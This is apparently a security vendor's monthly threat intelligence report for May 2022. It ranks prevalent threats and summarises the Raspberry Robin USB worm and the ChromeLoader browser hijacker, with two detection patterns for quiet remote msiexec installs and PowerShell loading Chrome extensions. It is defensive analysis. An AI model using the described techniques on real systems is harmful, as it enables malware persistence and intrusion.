Each month, the Intel team provides Red Canary customers with an analysis of trending, emerging, or otherwise important threats that we’ve encountered in confirmed threat detections, intelligence reporting, and elsewhere over the preceding month. We call this report our “Intelligence Insights” and share a public version of it with the broader infosec community.
Highlights
To track pervasiveness over time, we identify the number of unique customer environments in which we observed a given threat and compare it to what we’ve seen in previous months. Here’s how the numbers shook out for May 2022:
May rank | Threat name | Threat Description |
---|---|---|
May rank: ➡ 1* | Threat name: | Threat Description : Collection of Python classes to construct/manipulate network protocols |
May rank: ⬆ 1* | Threat name: | Threat Description : Open source tool that dumps credentials using various techniques |
May rank: ⬆ 3 | Threat name: | Threat Description : Dropper/downloader, often distributed through search engine redirects |
May rank: ⬆ 4 | Threat name: | Threat Description : Malware family used as part of a botnet. Some variants are worms and frequently spread via infected USB drives |
May rank: ⬆ 5* | Threat name: | Threat Description : Open source tool used to identify attack paths and relationships in Active Directory |
May rank: ⬇ 5* | Threat name: | Threat Description : Penetration testing tool that integrates functionality from multiple offensive security projects and leverages a native scripting language |
May rank: ⬇ 5* | Threat name: | Threat Description : Activity cluster using a worm spread by external drives that leverages Windows Installer to download a malicious DLL |
May rank: ⬆ 8 | Threat name: Metasploit | Threat Description : Penetration testing framework with a robust set of tools for exploiting vulnerabilities and executing code on a remote target machine |
May rank: ⬇ 9* | Threat name: | Threat Description : Banking trojan focused on stealing user data and banking credentials; delivered through phishing, existing Emotet infections, and malicious Windows Installer (MSI) packages |
May rank: ⬇ 9* | Threat name: | Threat Description : Malware family associated with ad fraud activity through the distribution of adware applications |
May rank: ⬇ 9* | Threat name: | Threat Description : Activity cluster characterized by the delivery of an information stealer and .NET RAT via search engine redirects |
⬆ = trending up from previous month
⬇= trending down from previous month
➡ = no change in rank from previous month
*Denotes a tie
Observations on trending threats
Overall threat volume increased slightly in May, with 13.3 percent of Red Canary customers encountering at least one named threat (up from 12.7% in April, but still below March’s 14.3% mark). Despite some typical shuffling, the prevalent threats this month were all within a few spots of last month’s top 10. Notably, after diving a little deeper into the differences between Gootkit and Gootloader, we’ve started to distinguish the more commonly observed Gootloader activity from the less common Gootkit payload. We previously tracked all of this activity under Gootkit, and the historical numbers for Gootloader referenced above reflect both Gootloader and Gootkit activity.
Blog posts published this month
In May, Red Canary published research on two threats: Raspberry Robin and ChromeLoader. In case you missed them, we’ve provided summaries here as well as links to the full articles.
Raspberry Robin
Raspberry Robin is Red Canary’s name for a cluster of USB worm activity that we’ve been tracking since September 2021. If that name sounds familiar, it might be because we’ve shared information about Raspberry Robin with you in previous Intelligence Insights as it climbed the charts. In early May, we also published a blog on Raspberry Robin with our research on this threat.
Raspberry Robin appears to spread via infected USB drives. When the infected drive is plugged into a system, a shortcut (LNK file) masquerading as a legitimate folder is executed. In its first phase of activity, Raspberry Robin uses msiexec.exe
to reach out to a malicious IP address for command and control (C2) communication.
Detection opportunity: msiexec.exe
downloading and executing packages
To detect suspicious use of msiexec.exe
by Raspberry Robin or other threats, it’s essential to take a look at the command line and the URL. Detecting msiexec.exe
making outbound network connections to download and install packages in the command line interface will give you the opportunity to examine the activity and determine if it’s malicious or not.
process == (msiexec
)
&&
process_command_line_includes == (http:
, https:
)
&&
process_command_line_includes == (/q
, -q
)
Over the past few weeks, we’ve heard from a number of security professionals who have spotted Raspberry Robin in their environments. We continue to monitor, track, and research Raspberry Robin activity and incorporate new information as necessary.
ChromeLoader
ChromeLoader is a pervasive and persistent browser hijacker that modifies its victims’ browser settings and redirects user traffic to advertisement websites. This malware is introduced via an ISO file that baits users into executing it by posing as a cracked video game or pirated movie or TV show. It eventually manifests as a browser extension.
Like most suspicious browser extensions, ChromeLoader is a relatively benign threat that hijacks user search queries and redirects traffic to an advertising site. However, ChromeLoader uses PowerShell to inject itself into the browser and add a malicious extension to it, a technique we don’t see very often (and one that often goes undetected by other security tools). If applied to a higher-impact threat—such as a credential harvester or spyware—this PowerShell behavior could help malware gain an initial foothold and go undetected before performing more overtly malicious activity, like exfiltrating data from a user’s browser session.
Detection opportunity: PowerShell spawning chrome.exe
containing load-extension
and AppData\Local
within the command line
The detection analytic looks for instances of the Chrome browser executable spawning from PowerShell with a corresponding command line that includes appdata\local
as a parameter.
parent_process_name == powershell.exe
&&
process_name == chrome.exe
&&
command_line_includes (AppData\Local,load-extension
)
For more details and additional opportunities to detect this pushy malvertiser, check out our May blog post.